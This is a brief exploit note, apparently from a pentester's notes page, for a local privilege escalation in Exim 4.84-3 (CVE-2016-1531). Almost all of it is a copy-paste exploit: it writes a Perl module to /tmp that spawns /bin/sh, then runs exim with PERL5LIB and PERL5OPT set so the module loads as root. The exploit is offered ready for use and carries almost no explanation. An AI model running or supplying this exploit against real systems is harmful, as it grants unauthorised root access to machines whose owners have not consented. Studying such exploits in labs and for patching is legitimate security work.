Exim 4.84-3 - Local Privilege Escalation
You can write files as root or force a perl module to load by manipulating the perl environment and running exim with the "perl_startup" arguement -ps.
https://g0blin.co.uk/pluck-vulnhub-writeup/
#Paste this in one go and get #root, no need to run each command separately.
echo [ CVE-2016-1531 local root exploit
cat > /tmp/root.pm << EOF
package root;
use strict;
use warnings;
system("/bin/sh");
EOF
PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps
Last updated